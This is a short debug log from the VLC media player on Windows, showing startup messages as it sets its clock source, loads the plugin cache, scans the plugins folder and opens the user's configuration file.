vlc.exe | main libvlc debug: using multimedia timers as clock source
|
vlc.exe | main libvlc debug: searching plug-in modules
|
vlc.exe | main libvlc debug: loading plugins cache file C:\Program Files\VideoLAN\VLC\plugins\plugins.dat
|
vlc.exe | main libvlc debug: recursively browsing `C:\Program Files\VideoLAN\VLC\plugins'
|
vlc.exe | main libvlc debug: opening config file (C:\Users\admin\AppData\Roaming\vlc\vlcrc)
|